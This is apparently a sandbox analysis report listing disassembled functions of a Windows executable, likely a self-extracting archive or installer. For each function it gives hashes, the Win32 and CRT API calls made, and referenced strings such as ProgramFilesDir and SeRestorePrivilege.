                                                • Instruction ID: 5170f903a00f6e22ce8d899a811989668d5d1c9efc5941699c1797e7bd45040c
                                                • Opcode Fuzzy Hash: 7e859dcae99c1cd946eca073c98c87c44f59234d2d485ea0a585760b10dd681c
                                                • Instruction Fuzzy Hash: 18F04F72A05229BBCB205BE1FC4CECF7FADEF45792B044051FA0AE2094EA349541CBE0
                                                APIs
                                                • GetDlgItem.USER32(?,00000066), ref: 00B226A9
                                                • SendMessageW.USER32(00000000,00000143,00000000,00B55380), ref: 00B226D6
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B22702
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00B225F4
                                                • ProgramFilesDir, xrefs: 00B225E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item
                                                • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                • API String ID: 3888421826-2634093826
                                                • Opcode ID: c2bbe21ed6416f0dc707af571e4732941e0049b5b6929236bede412428605112
                                                • Instruction ID: 9167ca8e8a0152867f33248b7818156f58f77fcb148a27a5da7239dd22b8521c
                                                • Opcode Fuzzy Hash: c2bbe21ed6416f0dc707af571e4732941e0049b5b6929236bede412428605112
                                                • Instruction Fuzzy Hash: 58815031900228AEDF24EBE4D891BEDBBF8AF18310F5454D9E509B7191DB716B89CB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen$H_prolog3
                                                • String ID: &nbsp;$<br>
                                                • API String ID: 1035939448-26742755
                                                • Opcode ID: 0d484fa000ed3422ecc90abc41d197b8fb976b32ef96a3af01e4487a8cca21c8
                                                • Instruction ID: 387e340f08a28e6608570a7ede222f0b676a095cac040fc1ffdb979f4ab76b18
                                                • Opcode Fuzzy Hash: 0d484fa000ed3422ecc90abc41d197b8fb976b32ef96a3af01e4487a8cca21c8
                                                • Instruction Fuzzy Hash: 1A416D31B002109BCB249F54E981B7D77B2FB95304FB084ADE4068B281EBB099D2CBD1
                                                APIs
                                                • LoadBitmapW.USER32(00000065), ref: 00B207F5
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00B2081A
                                                • DeleteObject.GDI32(00000000), ref: 00B2084C
                                                • DeleteObject.GDI32(00000000), ref: 00B2086F
                                                  • Part of subcall function 00B1EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B20845,00000066), ref: 00B1EBE6
                                                  • Part of subcall function 00B1EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EBFD
                                                  • Part of subcall function 00B1EBD3: LoadResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC14
                                                  • Part of subcall function 00B1EBD3: LockResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC23
                                                  • Part of subcall function 00B1EBD3: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00B20845,00000066), ref: 00B1EC3E
                                                  • Part of subcall function 00B1EBD3: GlobalLock.KERNEL32(00000000), ref: 00B1EC4F
                                                  • Part of subcall function 00B1EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B1EC73
                                                  • Part of subcall function 00B1EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B1ECB8
                                                  • Part of subcall function 00B1EBD3: GlobalUnlock.KERNEL32(00000000), ref: 00B1ECD7
                                                  • Part of subcall function 00B1EBD3: GlobalFree.KERNEL32(00000000), ref: 00B1ECDE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                • String ID: ]
                                                • API String ID: 1797374341-3352871620
                                                • Opcode ID: 1ab87d23ad5a4fc7d232367363691699ffc712091202efcabafc575492429456
                                                • Instruction ID: deb6c8ccc0d3b0c85be4498678761123387456e2b0a1815acbb2e2259a85cbb3
                                                • Opcode Fuzzy Hash: 1ab87d23ad5a4fc7d232367363691699ffc712091202efcabafc575492429456
                                                • Instruction Fuzzy Hash: 9E01C435950215A7D7117764AC09BBB7AF9EF80B56F0900A4FD14AB2D2EF71CC0586E1
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B2ECE0,00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002), ref: 00B2ED4F
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B2ED62
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00B2ECE0,00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002), ref: 00B2ED85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9809f2d6418f460d842ff6e831f38c66f947209fe0926c8de9e67c9f64ff2881
                                                • Instruction ID: 90ffa057b3cff9bf68cc5870cff5369212a82aee459c1cb80a4de3820add87ab
                                                • Opcode Fuzzy Hash: 9809f2d6418f460d842ff6e831f38c66f947209fe0926c8de9e67c9f64ff2881
                                                • Instruction Fuzzy Hash: 39F03135A50218FBDB159FA5DC59BAEBFF5EB04755F1001A8A809A2160CF359D41CB50
                                                APIs
                                                  • Part of subcall function 00B16C5E: __EH_prolog3_GS.LIBCMT ref: 00B16C65
                                                  • Part of subcall function 00B16C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00B16C9A
                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B150B3
                                                • GetProcAddress.KERNEL32(00B551F8,CryptUnprotectMemory), ref: 00B150C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AddressProc$DirectoryH_prolog3_System
                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                • API String ID: 270589589-1753850145
                                                • Opcode ID: 26aff16c3e5394ad2a895b2befe23cd4a09612b2addaa994b78c87ed6486ce0c
                                                • Instruction ID: 23d0472ace7418036d27818e5d570b3e82b5f2eb86ecce7f842ed335262adf38
                                                • Opcode Fuzzy Hash: 26aff16c3e5394ad2a895b2befe23cd4a09612b2addaa994b78c87ed6486ce0c
                                                • Instruction Fuzzy Hash: 72E04F70910751DEC7305BF8DC087867ED49F09704F60C8AEB4D9E3560DAB4E4808B90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AdjustPointer$_abort
                                                • String ID:
                                                • API String ID: 2252061734-0
                                                • Opcode ID: 2e0be1dec33ff608cb892fbf3c052c6405e067dc6ab54140891e779ec80bd6d8
                                                • Instruction ID: 6472d8bc64a6049b416d498f1caee907224cb39e9d39f8dbb731ed19a104168a
                                                • Opcode Fuzzy Hash: 2e0be1dec33ff608cb892fbf3c052c6405e067dc6ab54140891e779ec80bd6d8
                                                • Instruction Fuzzy Hash: 2251D272A012269FEB299F50E841BBAB7E4FF44720F1445ADE84D57291E731EC84C790
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0F3C5
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00B0B749,?,?,?,?,?,?), ref: 00B0F450
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00B0F4A7
                                                • SetFileTime.KERNEL32(?,?,?,?), ref: 00B0F569
                                                • CloseHandle.KERNEL32(?), ref: 00B0F570
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$Create$CloseH_prolog3_HandleTime
                                                • String ID:
                                                • API String ID: 4002707884-0
                                                • Opcode ID: f241af44706e085b7a142dfc679ce486116a817df7175632910d5cef916baaa0
                                                • Instruction ID: 208df592811154e8a7083b010319520a5fd62a7dd729dcded4c30ffc09a61136
                                                • Opcode Fuzzy Hash: f241af44706e085b7a142dfc679ce486116a817df7175632910d5cef916baaa0
                                                • Instruction Fuzzy Hash: 8E518B70A0424AAADF25DFE8D885BEEBBF5AF48310F240169F451F72C0DB349A45CB24
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 00B32BE9
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B32C0C
                                                  • Part of subcall function 00B3040E: RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B32C32
                                                • _free.LIBCMT ref: 00B32C45
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B32C54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 84066289c09fa5a8399346be6c88e420981185bac3e3af8b69b7cd133a457265
                                                • Instruction ID: 55b2e243202cbf32a318b701680e27f1b1170cb574b6a973ef569d5f3a523148
                                                • Opcode Fuzzy Hash: 84066289c09fa5a8399346be6c88e420981185bac3e3af8b69b7cd133a457265
                                                • Instruction Fuzzy Hash: 2E01D4736016107F3B262BA65C88D7F7EADDEC6B61B3501A8B904E3111DE608C01A2B0
                                                APIs
                                                • GetLastError.KERNEL32(00B2535E,00B2535E,?,00B301D8,00B30451,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?), ref: 00B3008E
                                                • _free.LIBCMT ref: 00B300C3
                                                • _free.LIBCMT ref: 00B300EA
                                                • SetLastError.KERNEL32(00000000,?,00B2535E), ref: 00B300F7
                                                • SetLastError.KERNEL32(00000000,?,00B2535E), ref: 00B30100
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 735abc96da2bf80246df1ac4f3e318ca26b19fb699601a6a9e2a87c0e6b9bfce
                                                • Instruction ID: 5b13296f83cbceb961c11121a4222a60edfa2af732c189554eda11e835953b48
                                                • Opcode Fuzzy Hash: 735abc96da2bf80246df1ac4f3e318ca26b19fb699601a6a9e2a87c0e6b9bfce
                                                • Instruction Fuzzy Hash: 8A01F4361A560567832A77786DE6F2F36EEDFC1771F3201A4F505A3192EF708C055224
                                                APIs
                                                • _free.LIBCMT ref: 00B334C7
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B334D9
                                                • _free.LIBCMT ref: 00B334EB
                                                • _free.LIBCMT ref: 00B334FD
                                                • _free.LIBCMT ref: 00B3350F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d91ebe30a7dca080aa04bd4c6721f2b529577584a7f743204536dda8305d3326
                                                • Instruction ID: ee4f61616daebd0dc58725263f379daa883e363dc215b7fca76e38977bfbf4c2
                                                • Opcode Fuzzy Hash: d91ebe30a7dca080aa04bd4c6721f2b529577584a7f743204536dda8305d3326
                                                • Instruction Fuzzy Hash: DBF0FF32514200A78B20EB58F496C17B7D9FE55B10B7A0885F408E7A01CB71FE848764
                                                APIs
                                                • _free.LIBCMT ref: 00B2F7DE
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B2F7F0
                                                • _free.LIBCMT ref: 00B2F803
                                                • _free.LIBCMT ref: 00B2F814
                                                • _free.LIBCMT ref: 00B2F825
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 77fda6fdbdbed64cb71a722a488ccaee5c7f5c2c7c6bc81bb7c0a12156337d2f
                                                • Instruction ID: 39fd8b163333d7a4ff8123e23fd1699ad80354d76cc86cfea6afd746b643f171
                                                • Opcode Fuzzy Hash: 77fda6fdbdbed64cb71a722a488ccaee5c7f5c2c7c6bc81bb7c0a12156337d2f
                                                • Instruction Fuzzy Hash: 45F05E748203208B9711BF28BC52509BBE1FB1D727B5102DAF419A3671CF711D06CF89
                                                APIs
                                                • _wcslen.LIBCMT ref: 00B231A4
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: .lnk$0$lnk
                                                • API String ID: 176396367-906397761
                                                • Opcode ID: 33a1480046aadef67dcff6abe5cd4d135a0ecdca7d24a69fd4f920b9d6207e29
                                                • Instruction ID: 1b1912eb413be44133ece91ea0d878230722f8d6ca1f7d645845777b4de30d78
                                                • Opcode Fuzzy Hash: 33a1480046aadef67dcff6abe5cd4d135a0ecdca7d24a69fd4f920b9d6207e29
                                                • Instruction Fuzzy Hash: A0E1E871D012689EDB24DBA4D885BDDB7F8AF08300F5045EAE549A7291DB74AB88CF60
                                                APIs
                                                • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00B22B66
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B10BF3: _wcslen.LIBCMT ref: 00B10C03
                                                • EndDialog.USER32(?,00000001), ref: 00B22EDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen$DialogPathTemp
                                                • String ID: $@set:user
                                                • API String ID: 2172748170-1503366402
                                                • Opcode ID: 14cbd9d2bdd75a5d086a8f5781a64f5e2f9019a885ce22fea0ebb2e5b9d32531
                                                • Instruction ID: e5b634b8996c55f2c29195840caaade801c3df3692255512fca5ff47114b2ec8
                                                • Opcode Fuzzy Hash: 14cbd9d2bdd75a5d086a8f5781a64f5e2f9019a885ce22fea0ebb2e5b9d32531
                                                • Instruction Fuzzy Hash: D6C13A30901269AEDF24EBA4DC45BEDBBF8AF15300F5405EAE449B3292DB705B89CF51
                                                APIs
                                                  • Part of subcall function 00B11309: __EH_prolog3.LIBCMT ref: 00B11310
                                                  • Part of subcall function 00B11309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00B117FB,?,?,\\?\,5EA84158,?,?,?,00000000,00B3A279,000000FF), ref: 00B11319
                                                  • Part of subcall function 00B11AD1: __EH_prolog3_GS.LIBCMT ref: 00B11AD8
                                                  • Part of subcall function 00B0F763: __EH_prolog3_GS.LIBCMT ref: 00B0F76A
                                                  • Part of subcall function 00B0F58B: __EH_prolog3_GS.LIBCMT ref: 00B0F592
                                                  • Part of subcall function 00B0F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00B0A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00B0F5A8
                                                  • Part of subcall function 00B0F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F5EB
                                                • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00B22137
                                                • MoveFileW.KERNEL32(?,?), ref: 00B222BE
                                                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00B222D8
                                                  • Part of subcall function 00B114CC: __EH_prolog3_GS.LIBCMT ref: 00B114D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                • String ID: .tmp
                                                • API String ID: 1688541384-2986845003
                                                • Opcode ID: 8b134ffab0a501935c5600a7bfb384d1e7c782051194f8d956299151ba5421a0
                                                • Instruction ID: 016b4c6730e30ed8488b5a693c2078b24f72bc01e7f8a0c09804a87aab5a2aa6
                                                • Opcode Fuzzy Hash: 8b134ffab0a501935c5600a7bfb384d1e7c782051194f8d956299151ba5421a0
                                                • Instruction Fuzzy Hash: FBC1D1719002689ADB25DFA4DC85BDDBBB8BF18300F5045EAE54DB3291DB345B89CF21
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0A307
                                                • GetLastError.KERNEL32(00000054,?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0A427
                                                  • Part of subcall function 00B0AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B0AC2E
                                                  • Part of subcall function 00B0AC11: GetLastError.KERNEL32 ref: 00B0AC72
                                                  • Part of subcall function 00B0AC11: CloseHandle.KERNEL32(?), ref: 00B0AC81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                • API String ID: 2235100918-639343689
                                                • Opcode ID: 8fcc4c557bc5dd2c06da2dfd2e6f72f2c838bc7cd10795895afed890b0d51dac
                                                • Instruction ID: fb45e272aed10fb46d916160955fae017af403da48d14a32fd750d9843d44ab3
                                                • Opcode Fuzzy Hash: 8fcc4c557bc5dd2c06da2dfd2e6f72f2c838bc7cd10795895afed890b0d51dac
